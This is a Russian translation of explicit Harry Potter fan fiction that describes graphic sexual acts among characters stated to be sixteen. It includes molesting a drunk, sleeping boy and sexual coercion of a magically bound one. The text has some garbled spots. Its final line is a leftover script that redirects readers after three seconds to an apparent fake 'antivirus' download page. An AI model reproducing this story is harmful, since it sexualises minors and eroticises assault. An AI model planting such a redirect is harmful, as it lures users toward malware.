Рождественский подарок
Christmas gift

Автор: Eggbert
Перевод: стыдливо прикрывающий лапками глаза Кот Бегемот и хихикающий профессор Коровьев.
Pairing: Гарри/Рон/Драко
Рейтинг: NC-17
Жанр: PWP
Disclaimer: все относящиеся к циклу о Гарри Поттере персонажи и идеи принадлежат Дж.К. Роулинг.
Размещение: Разрешение автора на размещение перевода получено.

Хогвардс опустел - большая часть студентов разъехалась по домам на Рождественские каникулы, погрузив вечно наполненное детскими голосами здание в гнетущую тишину. Единственным развлечением оставшихся шестнадцатилетних школьников стало посещение Хогсмида, где в тайне от преподавателей можно было попить сливочного пива или, если повезет, чего-нибудь покрепче.

Рон притащил изрядно накачанного алкоголем Гарри в спальню и бросил его на постель. Тот сразу же свернулся калачиком, занося грязные ботинки на кровать. "Нет, так дело не пойдет", - подумал Рон и стал стаскивать с Поттера одежду, стараясь не разбудить его. Хотя вряд ли бы ему это удалось: Гарри спал беспробудным сном, изредка издавая хрюкающие звуки. Покидав одежду Поттера на прикроватный стульчик, Рон уставился на своего друга - уже несколько месяцев Уизли мечтал о нем, видел во сне, как он и Гарри вместе занимаются сексом. Он вздрагивал от каждого случайного прикосновения к Поттеру, будь то за завтраком или на занятиях. Рон стонал, когда видел, как Гарри переодевается перед квиддичным матчем, подавлял в себе желание обнять его юношеское тело. Сможет ли Поттер его понять, сделай он это? Иногда, когда все крепко спали и видели десятые сны, Рон тихонько проскальзывал за занавеску гарриной кровати и тоскливо смотрел на друга. Занимаясь с самим собой греховной юношеской игрой, Уизли всегда представлял только Поттера, его жаркие объятия и влажные поцелуи.

Рон наклонился к спящему Гарри и нежно погладил его по груди, словно не веря своему счастью. Горячее от алкоголя тело подалось за рукой, словно требуя продолжения, Поттер что-то промурлыкал, но не проснулся. Рон перевел дыхание и переместил руку на лоб Гарри, ласково отодвигая спутавшиеся волосы. Кончиками пальцев он провел по лицу, ненадолго остановившись около губ, затем прочертил тонкую линию от шеи до живота. Рон почувствовал, как дыхание Гарри чуть ускорилось, и это заставило его отдернуть руку. Но Поттер спал. Рон аккуратно присел на кровать и приблизил губы к глазам Гарри. Нежно целуя каждый дюйм его лица, Уизли добрался до губ,пленно они яи ласково прижался к ним своими. Гарри застонал во сне и перевернулся на спину, широко раскинув ноги. Глядя на Поттера, лежащего в одних белых велосипедных шортиках, Рон почувствовал, как его члену сразу же стало тесно в собственных боксерах. Он скинул с себя мантию, одновременно избавляясь от брюк и маминого свитера. Член, оттянувший резинку его трусов, смешно выпирал из-под них, явно намекая, что они - лишние. Рон обошел кровать и склонился над шортиками Гарри, нежно касаясь выступающего бугорка губами. И почувствовал, как под тоненькой обтягивающей тканью что-то зашевелилось. Не прекращая ласк, Рон снял свои трусы и начал медленно мастурбировать, ощущая, как гаррин член наполняется кровью и рвется наружу сквозь белую ткань. Поттер снова застонал, в сонном экстазе приподнимая бедра. Рон отклонился и положил свободную руку на шортики Гарри, другой продолжая ласкать свой собственный член. Вспотевшая от волнения ладонь Уизли двигалась вверх и вниз по шортикам все быстрее и быстрее, возбужденное дыхание спящего Гарри становилось громче. Рон, почувствовав приближение собственного оргазма, грубо обхватил член Поттера и сжал его. Гарри застонал, тело его напряглось, и Уизли почувствовал толчки оргазма своего друга, наполняющие шортики горячей и липкой спермой. Не в силах больше сдерживаться, Рон кончил на Гарри, направляя струю семени на намокшую от гарриной спермы ткань.

- Что здесь происходит? - Уизли узнал этот голос. Последним, что он увидел, был Малфой, направляющий на него свою палочку-

Чей-то хриплый голос прошептал "Энервейт". Рон разлепил веки и уставился на скривившегося в ухмылке Малфоя.

- Я смотрю, вы здесь неплохо развлекаетесь? - прошипел Драко. Рон хотел броситься и набить морду этому самодовольному ублюдку, но его руки и ступни ног были связаны спутывающим заклятием.

- Что, Уизли, не хватило смелости стащить с Поттера трусики? - ухмыльнулся Малфой.

Глаза Рона загорелись злобным огнем, но он не мог пошевелиться, и продолжал лежать на коврике около кровати Поттера. Драко стянул с себя футболку и расстегнул джинсы, наслаждаясь ситуацией. Он медленно их снял, оставшись в черных шелковых боксерах. Рон смутился - ему еще никогда не приходилось видеть Драко почти полностью обнаженным. Бледная кожа Малфоя сильно контрастировала с черными трусами, из-под которых выглядывал напряженный член. Он подошел к Рону и палочкой удалил веревки с его ног. Разведя их левой стопой, Драко грубо уселся около паха Уизли.

- Признайся, что тебе хочется, Рональд, - злобно прошипел Малфой.

- Отвали от меня! - Рон яростно замотал головой.

- Тише, разбудишь нашего друга, - Драко кивнул в сторону Гарри. - Может, лучше разбудить твоего?

Малфой приспустил свои боксеры, и вынул немаленький для шестнадцатилетнего подростка пульсирующий член. Драко провел им по внутренней части бедер Рона, заставляя того участить дыхание. Чувствуя близость члена Малфоя, его собственный начал медленно подниматься.

- Не спится твоему другу? - Драко скривился. Он соединил оба члена вместе и начал водить по ним рукой. - Нравится, Уизли?

Малфой не стал дожидаться ответа от застонавшего в возбуждении Рона и склонился над его пахом. Он мягко обхватил губами ствол члена и начал погружать его в рот, иногда щекоча головку языком. Рону непроизвольно закачал бедрами и стал поднимать свой таз в такт движениям рта Малфоя.

- А так нравится, Уизли? - глаза Драко горели ненавистью. Он уже выпустил член Рона изо рта и, наклонившись вперед, стал имитировать движения полового акта. Их пенисы терлись друг о друга.

- Да, Драко... милый... давай... - застонал Уизли, теряя рассудок. - Быстрее...

Внезапно все прекратилось. Рон открыл глаза и увидел, что Драко стоит над ним, злобно усмехаясь.

- Ненавижу тебя, Малфой! - с ненавистью прошептал Рон.

- Он тоже так говорил, - Драко показал головой на спящего Поттера.

- Ты врешь! - Рон стиснул зубы. - Ты не спал с ним. Он не мог...

Драко забрался на кровать, достал с тумбочки палочку и произнес: "Энервейт". Уизли увидел, как Гарри дернулся и открыл глаза. Драко грубо оттянул белые шортики Поттера вниз.

- Мал-фой, - Гарри глупо улыбался. - Иди ко мне.

Рон не верил своим глазам √ Гарри притянул Драко к себе и начал страстно целовать его губы, одновременно запуская свою руку под черные трусы Малфоя. Их тела начали сливаться в одно целое, перекатывавшиеся чуть вправо и влево в порыве любви. Это продолжалось целую вечность, пока, наконец, Драко не откинулся на спину, чуть приподнимая бедра. Гарри начал стаскивать с него боксеры, выпуская на свободу напряженный член Малфоя. Поттер жадно припал к нему губами, начал погружать его в рот, заставляя Драко издавать хриплые возгласы удовольствия. Рон почувствовал сильное возбуждение, видя как Гарри сосет член Малфоя. Но шок от увиденного не позволял сделать ни шагу. Драко запустил тонкие пальцы в растрепанные волосы Гарри, заставляя того двигаться быстрее. Наконец, Драко грубо отстранил Поттера и перевернул его на спину.

- Ты любишь меня, Гарри? - Рону показалось, что в голосе Драко зазвучали тревожные нотки.

- Ты знаешь ответ, Малфой, - Поттер нежно обхватил ногами нависшее над ним тело Драко. - Я говорил тебе это много раз.

Невольный вскрик Гарри заставил Рона вздрогнуть: Малфой ввел свой член в Поттера и начал ритмично прижимать любовника к постели своим телом. Рону было видно, как ствол Драко проникает все глубже, заставляя Гарри стонать от удовольствия. Руки Поттера сжимали простынь, а на лице была блаженная улыбка.

- Сильнее, Драко... Еще... Пожалуйста... Глубже

Гарри просто извивался под телом Малфоя. Полувялый член Поттера смешно болтался из стороны в сторону. Драко закричал - Рон однажды слышал такой крик в душевой, он тогда надеялся, что Малфой сломал себе руку. Белокурый подросток отклонился назад и выстрелил белой струей на член Гарри.

- Драко, а как же я?  - простонал тот.

- Все еще только начинается, Поттер, - Малфой перевел взгляд на Рона. - Ты не заметил, что у нас гости?

Гарри с надеждой протянул к Уизли руки. Драко пробормотал заклятие и ткнул палочкой: веревки, опутывающие руки Рона, исчезли. Он бросился к Гарри, жарко припадая к его губам. Поттер нетерпеливо обхватил рукой пенис Рона и начал гладить его ствол. Уизли застонал, прижимаясь бедрами к телу Гарри, и ощутил тепло, исходившее от его напрягшегося члена, еще влажного от спермы Драко.

- Я всегда мечтал о тебе, Гарри, - простонал Рон, отрывая губы от страстного поцелуя.

- Я знаю, - тихо прошептал Поттер и осторожно перевернул Уизли на спину.

Гарри отодвинулся назад и погрузил пульсирующий от желания член Рона глубоко в рот. Уизли непроизвольно раздвинул ноги и обхватил голову Поттера, прижимая ее к себе. Стоны удовольствия срывались с его губ. Сквозь пелену в глазах Рон увидел, как Драко приподнял Гарри и раздвинул его ноги, пристраиваясь сзади. Резкий толчок заставил Гарри закричать и выпустить член Уизли изо рта. Поттер обхватил рукой свой уже обмякший пенис и начал исступленно онанировать.

- Гарри, пожалуйста, - Рон задыхался и приподнимал бедра, чтобы дотянуться своим членом до рта Поттера. - Еще... Давай же...

Гарри снова погрузил в горячий рот ноющий от нетерпения член Уизли, постепенно заставляя тело Рона опускаться на кровать. Драко хрипло стонал, все сильнее погружая свой пенис в Поттера. Рон чувствовал это по импульсам, передаваемым ему Гарри

- Драко, сильнее, - Рон уже был близок к разрядке. Гарри, глубже... еще быстрее... еще... глубже.

Оргазм Драко сотряс тело Поттера, и тот снова выпустил член Рона изо рта. Но для Уизли это было уже неважно мощная струя его спермы обрызгала Гарри все лицо. Драко сзади обхватил руками все еще продолжающего мастурбировать Поттера и отклонил его назад. Рон почувствовал, как капли гарриной спермы покрыли его чуть золотистый пах.

В изнеможении от прошедшей страсти они лежали на гарриной кровати, набираясь сил для следующего порыва. Рон задумчиво гладил Гарри по ягодицам, размазывая вытекающую из того сперму Драко, Малфой задумчиво распутывал слипшиеся золотые волосы около члена Уизли.

- Никогда не думал, что такое произойдет, - тихо прошептал Рон. Подумать только я, Гарри и Малфой.

- Иногда мечты сбываются, - процедил Драко. Я, например, шел к этому пять лет. Помнишь, Гарри?

- Помню, - Поттер снял мутные от стекающих капель семени очки и посмотрел на Рона. С наступающим рождеством, Уизли! Твои мечты сбылись.

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>